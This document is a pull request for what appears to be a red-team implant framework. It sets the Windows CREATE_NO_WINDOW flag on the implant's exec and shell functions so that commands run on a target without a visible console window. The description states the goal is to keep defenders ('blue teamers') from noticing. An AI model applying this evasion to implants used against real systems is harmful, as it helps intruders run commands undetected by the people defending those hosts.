### PR TITLE
fix: set CREATE_NO_WINDOW for sys.exec and sys.shell on Windows

### DIFF
--- a/implants/lib/eldritch/stdlib/eldritch-libsys/src/std/exec_impl.rs
+++ b/implants/lib/eldritch/stdlib/eldritch-libsys/src/std/exec_impl.rs
@@ -7,12 +7,18 @@ use std::collections::HashMap;
 use std::io::Write; // Required for writing to stdin
 use std::process::{Command, Stdio};
 
+#[cfg(target_os = "windows")]
+use std::os::windows::process::CommandExt;
+
 #[cfg(any(target_os = "linux", target_os = "macos", target_os = "freebsd"))]
 use {
     nix::sys::wait::wait,
     nix::unistd::{ForkResult, fork, setsid},
     std::process::exit,
 };
+
+#[cfg(target_os = "windows")]
+const CREATE_NO_WINDOW: u32 = 0x08000000;
 
 struct CommandOutput {
     stdout: String,
@@ -60,13 +66,15 @@ fn handle_exec(
         Stdio::null()
     };
     if !disown {
-        let mut child = Command::new(path)
-            .args(args)
+        let mut cmd = Command::new(path);
+        cmd.args(args)
             .envs(env_vars)
             .stdin(stdinpipe)
             .stdout(Stdio::piped())
-            .stderr(Stdio::piped())
-            .spawn()?;
+            .stderr(Stdio::piped());
+        #[cfg(target_os = "windows")]
+        cmd.creation_flags(CREATE_NO_WINDOW);
+        let mut child = cmd.spawn()?;
 
         // If we have input, write it to the pipe
         if let Some(text) = input
@@ -95,6 +103,7 @@ fn handle_exec(
                 .stdin(stdinpipe)
                 .args(args)
                 .envs(env_vars)
+                .creation_flags(CREATE_NO_WINDOW)
                 .spawn()?;
 
             if let Some(text) = input {

--- a/implants/lib/eldritch/stdlib/eldritch-libsys/src/std/shell_impl.rs
+++ b/implants/lib/eldritch/stdlib/eldritch-libsys/src/std/shell_impl.rs
@@ -9,10 +9,14 @@ use {
     std::ffi::{OsStr, OsString, c_void},
     std::iter::once,
     std::os::windows::ffi::{OsStrExt, OsStringExt},
+    std::os::windows::process::CommandExt,
     std::path::Path,
     std::{slice, str},
     windows_sys::Win32::UI::Shell::CommandLineToArgvW,
 };
+
+#[cfg(target_os = "windows")]
+const CREATE_NO_WINDOW: u32 = 0x08000000;
 
 struct CommandOutput {
     stdout: String,
@@ -89,7 +93,10 @@ fn handle_shell(cmd: String) -> Result<CommandOutput> {
         let command_string = "cmd";
         let all_together = format!("/c {}", cmd);
         let new_arg = to_argv(all_together.as_str());
-        let tmp_res = Command::new(command_string).args(new_arg).output()?;
+        let tmp_res = Command::new(command_string)
+            .args(new_arg)
+            .creation_flags(CREATE_NO_WINDOW)
+            .output()?;
         Ok(CommandOutput {
             stdout: String::from_utf8_lossy(&tmp_res.stdout).to_string(),
             stderr: String::from_utf8_lossy(&tmp_res.stderr).to_string(),


### PR DESCRIPTION
## Summary

Right now when you use `sys.exec` or `sys.shell` on Windows, `cmd.exe` or `powershell.exe` will flash a visible console window on the target every time a tome runs one of those functions. This is obviously not ideal during an engagement since blue teamers can see the window pop up.

This sets the `CREATE_NO_WINDOW` (`0x08000000`) flag on all Windows process spawns in both `sys.exec` (both the `disown=True` and `disown=False` paths) and `sys.shell`. This is the same approach that [Sliver uses in their implant](https://github.com/BishopFox/sliver/blob/master/implant/sliver/shell/shell_windows.go) where they set `HideWindow: true` on `SysProcAttr` for all Windows shell execution, which maps to the same underlying Win32 creation flag.

All changes are behind `#[cfg(target_os = "windows")]` so Linux/macOS/BSD paths are completely untouched.

## Files Changed

- `implants/lib/eldritch/stdlib/eldritch-libsys/src/std/exec_impl.rs` - import `CommandExt`, define `CREATE_NO_WINDOW`, set the flag on both the disown and non-disown spawn paths
- `implants/lib/eldritch/stdlib/eldritch-libsys/src/std/shell_impl.rs` - import `CommandExt`, define `CREATE_NO_WINDOW`, set the flag on the `cmd.exe /C` spawn